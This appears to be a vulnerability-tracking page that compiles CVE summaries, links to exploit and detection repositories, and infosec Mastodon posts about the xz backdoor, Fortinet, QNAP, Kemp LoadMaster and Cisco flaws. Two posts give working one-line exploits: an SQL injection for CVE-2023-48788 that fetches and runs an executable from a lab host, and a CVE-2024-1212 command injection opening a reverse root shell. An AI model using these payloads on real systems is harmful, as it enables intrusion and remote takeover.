https://github.com/bioless/xz_cve-2024-3094_detection

https://github.com/k4t3pr0/Check-CVE-2024-3094

https://github.com/buluma/ansible-role-cve_2024_3094

https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker

https://github.com/0xlane/xz-cve-2024-3094

https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094

https://github.com/pentestfunctions/CVE-2024-3094

https://github.com/mesutgungor/xz-backdoor-vulnerability

https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector

https://github.com/weltregie/liblzma-scan

https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits

https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094

https://github.com/harekrishnarai/xz-utils-vuln-checker

https://github.com/robertdebock/ansible-role-cve_2024_3094

https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-

https://github.com/neuralinhibitor/xzwhy

https://github.com/Horizon-Software-Development/CVE-2024-3094

https://github.com/jfrog/cve-2024-3094-tools

https://github.com/r0binak/xzk8s

https://github.com/gustavorobertux/CVE-2024-3094

https://github.com/reuteras/CVE-2024-3094

https://github.com/ashwani95/CVE-2024-3094

https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer

https://github.com/galacticquest/cve-2024-3094-detect

https://github.com/Fractal-Tess/CVE-2024-3094

https://github.com/Juul/xz-backdoor-scan

https://github.com/badsectorlabs/ludus_xz_backdoor

https://github.com/Simplifi-ED/CVE-2024-3094-patcher

https://github.com/wgetnz/CVE-2024-3094-check

https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script

https://github.com/emirkmo/xz-backdoor-github

https://github.com/lockness-Ko/xz-vulnerable-honeypot

https://github.com/krascovict/OSINT---CVE-2024-3094-

https://github.com/mightysai1997/CVE-2024-3094-info

https://github.com/brinhosa/CVE-2024-3094-One-Liner

https://github.com/isuruwa/CVE-2024-3094

https://github.com/teyhouse/CVE-2024-3094

https://github.com/byinarie/CVE-2024-3094-info

https://github.com/amlweems/xzbot

https://github.com/bsekercioglu/cve2024-3094-Checker

https://github.com/hackingetico21/revisaxzutils

https://github.com/FabioBaroni/CVE-2024-3094-checker

https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check

https://github.com/Yuma-Tsushima07/CVE-2024-3094

https://github.com/ackemed/detectar_cve-2024-3094

https://github.com/zgimszhd61/cve-2024-3094-detect-tool

https://github.com/przemoc/xz-backdoor-links

https://github.com/ScrimForever/CVE-2024-3094

https://github.com/CyberGuard-Foundation/CVE-2024-3094

https://github.com/hazemkya/CVE-2024-3094-checker

https://github.com/dah4k/CVE-2024-3094

https://github.com/mightysai1997/CVE-2024-3094

https://github.com/crfearnworks/ansible-CVE-2024-3094

https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check

screaminggoat at 2024-04-26T15:53:22.631Z ##

Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.

##

screaminggoat at 2024-04-22T13:45:10.286Z ##

Elaastic on CVE-2024-3094 🔗 discuss.elastic.co/t/elastic-s

On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.

##

screaminggoat@infosec.exchange at 2024-04-26T15:53:22.000Z ##

Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.

##

simontsui@infosec.exchange at 2024-04-22T13:45:10.000Z ##

Elaastic on CVE-2024-3094 🔗 discuss.elastic.co/t/elastic-s

On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.

#CVE_2024_3094 #xz #xzbackdoor #supplychainattack

##

tasiaiso@wetdry.world at 2024-04-21T17:54:37.000Z ##

For those that go crying on social media about an application telling you to curl | bash or even to curl | sudo bash because you're running arbitrary code as root:

That is useless unless you plan to carefully review and audit every line of code that runs on your computer.

Even if you do install said app, do you actually trust it's code ? Do you trust it's dependencies ? What about it's subdependencies ?

There's an infinity of ways to infect an open-source repo with bad code, and some of them are actually scarily easy to perform. Do you trust that your favorite compression utility doesn't contain code that backdoors freaking ssh (nvd.nist.gov/vuln/detail/CVE-2) ? Do you trust that a script won't remove a critical system directory because of a misplaced space (github.com/MrMEEE/bumblebee-Ol) ? Or that an ubiquitous logging library can allow remote code execution because of a bad default configuration (en.m.wikipedia.org/wiki/Log4Sh) ?

I hope I can get this message stuck deep inside your head and let you know that unless you make your own operating system from scratch (including your free bootloader, kernel, gpu driver and the rest), you have to trust somebody. And it only takes one mistake to compromise a whole distribution, or even worse. You have to balance between having a new shiny program and having a new way to get shelled.

##

CVE-2024-2887(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-03-29T06:30:30

4 posts

Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-05-03T15:29:41.385Z ##

Zero Day Initiative: CVE-2024-2887: A Pwn2Own Winning Bug in Google Chrome
Manfred Paul, who demonstrated a Type Confusion exploit in Google Chrome's WebAssembly at Pwn2Own Vancouver 2024, provides root cause analysis of this vulnerability, tracked as CVE-2024-2887 (CVSS score still pending). The impact gives arbitrary reads and writes within the V8 memory sandbox. An integer underflow leading to V8 Sandbox escape allows for arbitrary code execution on a read-write-execute page.

##

screaminggoat@infosec.exchange at 2024-05-03T15:29:41.000Z ##

Zero Day Initiative: CVE-2024-2887: A Pwn2Own Winning Bug in Google Chrome
Manfred Paul, who demonstrated a Type Confusion exploit in Google Chrome's WebAssembly at Pwn2Own Vancouver 2024, provides root cause analysis of this vulnerability, tracked as CVE-2024-2887 (CVSS score still pending). The impact gives arbitrary reads and writes within the V8 memory sandbox. An integer underflow leading to V8 Sandbox escape allows for arbitrary code execution on a read-write-execute page.

#CVE_2024_2887 #Google #Chrome #vulnerability #rca

##

thezdi at 2024-05-02T16:16:35.234Z ##

In a new guest blog, winner @_manfp details CVE-2024-2887 - a bug he used to exploit both and during the contest on his way to winning Master of Pwn. He breaks down the root cause and shows how he exploited it. Read the details at zerodayinitiative.com/blog/202

##

thezdi@infosec.exchange at 2024-05-02T16:16:35.000Z ##

In a new guest blog, #Pwn2Own winner @_manfp details CVE-2024-2887 - a bug he used to exploit both #Chrome and #Edge during the contest on his way to winning Master of Pwn. He breaks down the root cause and shows how he exploited it. Read the details at zerodayinitiative.com/blog/202

##

CVE-2023-48788
(9.8 CRITICAL)

EPSS: 56.22%

updated 2024-03-26T01:00:02.003000

4 posts

A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.

1 repos

https://github.com/horizon3ai/CVE-2023-48788

catc0n at 2024-04-26T21:29:01.741Z ##

Good haul this week, including modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

wvu at 2024-04-23T07:20:37.220Z ##

CVE-2023-48788 RCE:

echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013

##

catc0n@infosec.exchange at 2024-04-26T21:29:01.000Z ##

Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

wvu@infosec.exchange at 2024-04-23T07:20:37.000Z ##

CVE-2023-48788 RCE:

echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013

##

screaminggoat at 2024-05-03T16:28:18.207Z ##

JetBrains TeamCity 2024.03.1 Is Here
Ah shit here we go again. JetBrains, notoriously averse to sharing vulnerability details, mentions 2 security problems being fixed in their TeamCity 2024.03.1 Release Notes but does not provide CVE IDs.

Why you should care about updating TeamCity:
A previous TeamCity vulnerability CVE-2024-27198 (9.8 critical, disclosed 04 March 2024, authentication bypass to create a new administrative user) was exploited within 24 hours of public disclosure (and release of their proofs of concept). It was added to CISA's KEV Catalog 3 days later.

cc: @reverseics @campuscodi

##

screaminggoat@infosec.exchange at 2024-05-03T16:28:18.000Z ##

JetBrains TeamCity 2024.03.1 Is Here
Ah shit here we go again. JetBrains, notoriously averse to sharing vulnerability details, mentions 2 security problems being fixed in their TeamCity 2024.03.1 Release Notes but does not provide CVE IDs.

Why you should care about updating TeamCity:
A previous TeamCity vulnerability CVE-2024-27198 (9.8 critical, disclosed 04 March 2024, authentication bypass to create a new administrative user) was exploited within 24 hours of public disclosure (and release of their proofs of concept). It was added to CISA's KEV Catalog 3 days later.

cc: @reverseics @campuscodi

#JetBrains #TeamCity #Vulnerability

##

CVE-2024-21899
(9.8 CRITICAL)

EPSS: 0.09%

updated 2024-03-13T14:25:02.043000

2 posts

An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-21901
(4.7 MEDIUM)

EPSS: 0.04%

updated 2024-03-08T18:30:35

2 posts

A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network. We have already fixed the vulnerability in the following versions: myQNAPcloud 1.0.52 ( 2023/11/24 ) and later QTS 4.5.4.2627 build 20231225 and later

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-21900
(4.3 MEDIUM)

EPSS: 0.05%

updated 2024-03-08T18:30:35

2 posts

An injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTScloud c5.1.5.2651 and later

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-20345
(6.5 MEDIUM)

EPSS: 0.04%

updated 2024-03-07T13:52:27.110000

2 posts

A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow

screaminggoat at 2024-05-02T18:27:15.959Z ##

CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.

##

screaminggoat@infosec.exchange at 2024-05-02T18:27:15.000Z ##

CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.

#CISA #FBI #pathtraversal #securebydesign #CVE_2024_1708 #CVE_2024_20345 #threatintel

##

CVE-2024-1708
(8.5 HIGH)

EPSS: 0.05%

updated 2024-02-22T15:30:39

2 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.

2 repos

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

screaminggoat at 2024-05-02T18:27:15.959Z ##

CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.

##

screaminggoat@infosec.exchange at 2024-05-02T18:27:15.000Z ##

CISA: CISA and FBI Release Secure by Design Alert to Urge Manufacturers to Eliminate Directory Traversal Vulnerabilities
CISA and FBI released a joint Secure by Design Alert, Eliminating Directory Traversal Vulnerabilities in Software (PDF). This Alert was crafted in response to recent well-publicized threat actor campaigns that exploited directory traversal vulnerabilities in software (e.g., CVE-2024-1708, CVE-2024-20345) to compromise users of the software—impacting critical infrastructure sectors, including the Healthcare and Public Health Sector. Additionally, this Alert highlights the prevalence, and continued threat actor exploitation of, directory traversal defects. Currently, CISA has listed 55 directory traversal vulnerabilities in the Known Exploited Vulnerabilities (KEV) Catalog.

#CISA #FBI #pathtraversal #securebydesign #CVE_2024_1708 #CVE_2024_20345 #threatintel

##

CVE-2024-1212
(10.0 CRITICAL)

EPSS: 0.21%

updated 2024-02-21T18:31:06

4 posts

Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.

Nuclei template

1 repos

https://github.com/Chocapikk/CVE-2024-1212

pentesttools at 2024-04-30T11:33:10.581Z ##

Hi there! You look like someone who appreciates the finer things in . 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

wvu at 2024-04-23T07:11:36.254Z ##

CVE-2024-1212 reverse root shell:

curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"

##

pentesttools@infosec.exchange at 2024-04-30T11:33:10.000Z ##

Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

wvu@infosec.exchange at 2024-04-23T07:11:36.000Z ##

CVE-2024-1212 reverse root shell:

curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"

##

CVE-2023-50386
(8.8 HIGH)

EPSS: 87.24%

updated 2024-02-15T18:40:48.837000

2 posts

Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API. When

1 repos

https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC

catc0n at 2024-04-26T21:29:01.741Z ##

Good haul this week, including modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

catc0n@infosec.exchange at 2024-04-26T21:29:01.000Z ##

Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

CVE-2024-21893
(8.2 HIGH)

EPSS: 96.30%

updated 2024-02-09T05:11:32

2 posts

A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.

Nuclei template

4 repos

https://github.com/h4x0r-dz/CVE-2024-21893.py

https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887

https://github.com/gobysec/GobyVuls

https://github.com/gobysec/Goby

screaminggoat at 2024-05-04T02:30:43.528Z ##

@nf3xn While MITRE seems like a small fry, Forbes probably explained it best: Inside America's Secretive $2 Billion Research Hub: Collecting Fingerprints from Facebook, Hacking Smartwatches, and Fighting Covid-19 (13 July 2020)

MITRE was one of several targets. To show how dangerous and how massively exploited Ivanti was to the U.S. Government, the CVE-2024-21893 (Ivanti Connect Secure/Policy Secure/Neurons Server-Side Request Forgery (SSRF) Vulnerability) was added to the Known Exploited Vulnerabilities Catalog 31 January 2024 with a due date of 02 February 2024, two days later. For reference, most KEV entries have 2-3 weeks to remediate.

Fun fact, CISA announced a second set of CVEs to the KEV Catalog on 10 January and 31 January 2024... both times for Ivanti's actively exploited zero-days. I don't recall CISA ever adding additional KEV entries instead of just waiting until the next day.

##

screaminggoat@infosec.exchange at 2024-05-04T02:30:43.000Z ##

@nf3xn While MITRE seems like a small fry, Forbes probably explained it best: Inside America's Secretive $2 Billion Research Hub: Collecting Fingerprints from Facebook, Hacking Smartwatches, and Fighting Covid-19 (13 July 2020)

MITRE was one of several targets. To show how dangerous and how massively exploited Ivanti was to the U.S. Government, the CVE-2024-21893 (Ivanti Connect Secure/Policy Secure/Neurons Server-Side Request Forgery (SSRF) Vulnerability) was added to the Known Exploited Vulnerabilities Catalog 31 January 2024 with a due date of 02 February 2024, two days later. For reference, most KEV entries have 2-3 weeks to remediate.

Fun fact, CISA announced a second set of CVEs to the KEV Catalog on 10 January and 31 January 2024... both times for Ivanti's actively exploited zero-days. I don't recall CISA ever adding additional KEV entries instead of just waiting until the next day.

##

CVE-2023-20198
(10.0 CRITICAL)

EPSS: 87.33%

updated 2024-02-03T05:07:29

2 posts

Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For s

Nuclei template

28 repos

https://github.com/IceBreakerCode/CVE-2023-20198

https://github.com/Shadow0ps/CVE-2023-20198-Scanner

https://github.com/alekos3/CVE_2023_20198_Detector

https://github.com/sohaibeb/CVE-2023-20198

https://github.com/codeb0ss/CVE-2023-20198-PoC

https://github.com/RevoltSecurities/CVE-2023-20198

https://github.com/ohlawd/CVE-2023-20198

https://github.com/netbell/CVE-2023-20198-Fix

https://github.com/alekos3/CVE_2023_20198_Remediator

https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198

https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner

https://github.com/JoyGhoshs/CVE-2023-20198

https://github.com/kacem-expereo/CVE-2023-20198

https://github.com/Atea-Redteam/CVE-2023-20198

https://github.com/Pushkarup/CVE-2023-20198

https://github.com/securityphoenix/cisco-CVE-2023-20198-tester

https://github.com/smokeintheshell/CVE-2023-20198

https://github.com/raystr-atearedteam/CVE-2023-20198-checker

https://github.com/Vulnmachines/Cisco_CVE-2023-20198

https://github.com/vulncheck-oss/cisco-ios-xe-implant-scanner

https://github.com/hackingyseguridad/nmap

https://github.com/iveresk/cve-2023-20198

https://github.com/fox-it/cisco-ios-xe-implant-detection

https://github.com/ZephrFish/CVE-2023-20198-Checker

https://github.com/W01fh4cker/CVE-2023-20198-RCE

https://github.com/Tounsi007/CVE-2023-20198

https://github.com/reket99/Cisco_CVE-2023-20198

https://github.com/Codeb3af/CVE-2023-20198-RCE

CVE-2024-0204
(9.8 CRITICAL)

EPSS: 53.86%

updated 2024-02-02T18:30:29

2 posts

Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.

Nuclei template

6 repos

https://github.com/adminlove520/CVE-2024-0204

https://github.com/cbeek-r7/CVE-2024-0204

https://github.com/gobysec/GobyVuls

https://github.com/horizon3ai/CVE-2024-0204

https://github.com/m-cetin/CVE-2024-0204

https://github.com/gobysec/Goby

pentesttools at 2024-04-30T11:33:10.581Z ##

Hi there! You look like someone who appreciates the finer things in . 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

pentesttools@infosec.exchange at 2024-04-30T11:33:10.000Z ##

Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:

